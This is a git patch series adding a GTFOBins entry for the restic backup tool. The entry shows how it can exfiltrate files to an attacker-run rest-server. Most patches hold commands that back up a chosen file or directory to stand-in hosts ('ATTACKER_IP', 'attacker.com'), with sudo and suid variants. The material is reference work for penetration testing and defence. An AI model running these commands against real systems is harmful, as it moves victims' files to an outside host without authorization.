From b2a2b3a5f07a15c18a98fa241b4a552b75bbf8b5 Mon Sep 17 00:00:00 2001
From: PreethamBomma <41102108+PreethamBomma@users.noreply.github.com>
Date: Mon, 6 Apr 2020 22:20:51 +0530
Subject: [PATCH 1/3] Add restic.md

---
 _gtfobins/restic.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 _gtfobins/restic.md

diff --git a/_gtfobins/restic.md b/_gtfobins/restic.md
new file mode 100644
index 0000000..00d2d1f
--- /dev/null
+++ b/_gtfobins/restic.md
@@ -0,0 +1,18 @@
+---
+functions:
+  sudo:
+    - description: Restic can be used to backup files. Run the commands in the sequence given below.
+      code: |
+        <!-- Attacker Machine -->
+        rest-server --no-auth --listen http://ATTACKER_IP:PORT
+        <!-- Victim Machine -->
+        TARGET=rest_repository
+        BACKUP=file_or_directory_to_backup
+        sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
+        sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
+        <!-- Attacker Machine -->
+        TARGET=rest_repository
+        DESTINATION=backup_to_restore
+        mkdir /tmp/restic/$DESTINATION
+        restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
+---

From 9ec96219a35cadec8a0fb128207faa3d35cab5ed Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sun, 12 Apr 2020 11:46:55 +0200
Subject: [PATCH 2/3] Fix line termination

---
 _gtfobins/restic.md | 36 ++++++++++++++++++------------------
 1 file changed, 18 insertions(+), 18 deletions(-)

diff --git a/_gtfobins/restic.md b/_gtfobins/restic.md
index 00d2d1f..bdc2c87 100644
--- a/_gtfobins/restic.md
+++ b/_gtfobins/restic.md
@@ -1,18 +1,18 @@
----
-functions:
-  sudo:
-    - description: Restic can be used to backup files. Run the commands in the sequence given below.
-      code: |
-        <!-- Attacker Machine -->
-        rest-server --no-auth --listen http://ATTACKER_IP:PORT
-        <!-- Victim Machine -->
-        TARGET=rest_repository
-        BACKUP=file_or_directory_to_backup
-        sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
-        sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
-        <!-- Attacker Machine -->
-        TARGET=rest_repository
-        DESTINATION=backup_to_restore
-        mkdir /tmp/restic/$DESTINATION
-        restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
----
+---
+functions:
+  sudo:
+    - description: Restic can be used to backup files. Run the commands in the sequence given below.
+      code: |
+        <!-- Attacker Machine -->
+        rest-server --no-auth --listen http://ATTACKER_IP:PORT
+        <!-- Victim Machine -->
+        TARGET=rest_repository
+        BACKUP=file_or_directory_to_backup
+        sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
+        sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
+        <!-- Attacker Machine -->
+        TARGET=rest_repository
+        DESTINATION=backup_to_restore
+        mkdir /tmp/restic/$DESTINATION
+        restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
+---

From 7f6221646b24430f49202635b4c121fb058ffaf8 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Sun, 12 Apr 2020 13:08:55 +0200
Subject: [PATCH 3/3] Fix and improve restic

---
 _gtfobins/restic.md | 51 ++++++++++++++++++++++++++++++++-------------
 1 file changed, 37 insertions(+), 14 deletions(-)

diff --git a/_gtfobins/restic.md b/_gtfobins/restic.md
index bdc2c87..ea362aa 100644
--- a/_gtfobins/restic.md
+++ b/_gtfobins/restic.md
@@ -1,18 +1,41 @@
 ---
+description: |
+  The attacker must setup a server to receive the backups, in the following example [rest-server](https://github.com/restic/rest-server/) is used but there are other options. To start a new instance and create a new repository:
+
+  ```console
+  RPORT=12345
+  NAME=backup_name
+  ./rest-server --listen ":$RPORT"
+  restic init -r "rest:http://localhost:$RPORT/$NAME"
+  ```
+
+  To extract the data from the restic repository in the current directory on the attacker side:
+
+  ```console
+  restic restore -r "/tmp/restic/$NAME" latest --target .
+  ```
+
+  Upload data to the attacker server with the following commands.
 functions:
+  file-upload:
+    - code: |
+        RHOST=attacker.com
+        RPORT=12345
+        LFILE=file_or_dir_to_get
+        NAME=backup_name
+        restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
   sudo:
-    - description: Restic can be used to backup files. Run the commands in the sequence given below.
-      code: |
-        <!-- Attacker Machine -->
-        rest-server --no-auth --listen http://ATTACKER_IP:PORT
-        <!-- Victim Machine -->
-        TARGET=rest_repository
-        BACKUP=file_or_directory_to_backup
-        sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
-        sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
-        <!-- Attacker Machine -->
-        TARGET=rest_repository
-        DESTINATION=backup_to_restore
-        mkdir /tmp/restic/$DESTINATION
-        restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
+    - code: |
+        RHOST=attacker.com
+        RPORT=12345
+        LFILE=file_or_dir_to_get
+        NAME=backup_name
+        sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
+  suid:
+    - code: |
+        RHOST=attacker.com
+        RPORT=12345
+        LFILE=file_or_dir_to_get
+        NAME=backup_name
+        ./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
 ---